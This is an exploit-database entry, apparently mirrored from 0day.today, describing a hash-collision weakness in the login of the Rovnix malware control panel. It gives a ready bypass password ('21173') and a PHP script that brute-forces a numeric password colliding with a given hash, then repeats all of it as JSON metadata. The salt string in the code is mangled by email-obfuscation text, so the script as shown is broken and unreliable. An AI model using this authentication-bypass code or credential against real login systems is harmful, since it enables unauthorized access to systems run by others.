Search...

Rovnix hash collision vulnerability

2013-12-12T00:00:00

ID 1337DAY-ID-21659
Type zdt
Reporter Xylitol
Modified 2013-12-12T00:00:00

Description

Exploitation of a weakness in Rovnix malicious software hash function. The default password on Rovnix panel are 'admin' admin = fbff791ef0770855e599ea6f87d41653 but you can log with '21173' This exploit will defeat the weak hash function of Rovnix to get password from a hash.

                                        
                                            &lt;?php
        /**
         * Defeat the weak hash function of Rovnix
         * to get password from a hash.
         */
     
        $HASH   = 'fbff791ef0770855e599ea6f87d41653';
     
        $value  = getNumber($HASH);
        $search = search($value, $HASH);
     
        echo('Hash:   ' . $HASH  . '&lt;br /&gt;');
        echo('Value:  ' . $value . '&lt;br /&gt;');
        echo('Search: ' . $search);
     
        // Search an working (number) password
        function search($value, $hash) {
                $i = 0;
             
                while (true) {
                        if (getHash($i) == $value)
                                return $i;
                     
                        $i++;
                }
        }
     
        // Get the hashed number
        function getNumber($hash) {
                $i = 0;
             
                while (true) {
                        if (md5($i) == $hash)
                                return $i;
                     
                        $i++;
                }
        }
     
        // Hash function without final MD5 (return only numbers)
        function getHash($hash) {
                $salt = 'LKJFDJLJkkljKJKJKJkjkj$i%&@(%[email protected]@[email protected]!cdh*[email protected]#[email protected]*[email protected]$jkeJFJLEJFE';
             
                return $hash + $salt + md5($salt) + md5($hash) + $salt[3];
        }
?&gt;

#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-21659", "lastseen": "2018-01-05T15:08:49", "viewCount": 10, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-01-05T15:08:49", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-05T15:08:49", "rev": 2}, "vulnersScore": 0.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21659", "description": "Exploitation of a weakness in Rovnix malicious software hash function.\rThe default password on Rovnix panel are 'admin'\radmin = fbff791ef0770855e599ea6f87d41653\rbut you can log with '21173'\rThis exploit will defeat the weak hash function of Rovnix to get password from a hash.", "title": "Rovnix hash collision vulnerability", "cvelist": [], "sourceData": "<?php\r\n /**\r\n * Defeat the weak hash function of Rovnix\r\n * to get password from a hash.\r\n */\r\n \r\n $HASH = 'fbff791ef0770855e599ea6f87d41653';\r\n \r\n $value = getNumber($HASH);\r\n $search = search($value, $HASH);\r\n \r\n echo('Hash: ' . $HASH . '<br />');\r\n echo('Value: ' . $value . '<br />');\r\n echo('Search: ' . $search);\r\n \r\n // Search an working (number) password\r\n function search($value, $hash) {\r\n $i = 0;\r\n \r\n while (true) {\r\n if (getHash($i) == $value)\r\n return $i;\r\n \r\n $i++;\r\n }\r\n }\r\n \r\n // Get the hashed number\r\n function getNumber($hash) {\r\n $i = 0;\r\n \r\n while (true) {\r\n if (md5($i) == $hash)\r\n return $i;\r\n \r\n $i++;\r\n }\r\n }\r\n \r\n // Hash function without final MD5 (return only numbers)\r\n function getHash($hash) {\r\n $salt = 'LKJFDJLJkkljKJKJKJkjkj$i%&@(%[email\u00a0protected]@[email\u00a0protected]!cdh*[email\u00a0protected]#[email\u00a0protected]*[email\u00a0protected]$jkeJFJLEJFE';\r\n \r\n return $hash + $salt + md5($salt) + md5($hash) + $salt[3];\r\n }\r\n?>\n\n# 0day.today [2018-01-05] #", "published": "2013-12-12T00:00:00", "references": [], "reporter": "Xylitol", "modified": "2013-12-12T00:00:00", "href": "https://0day.today/exploit/description/21659"}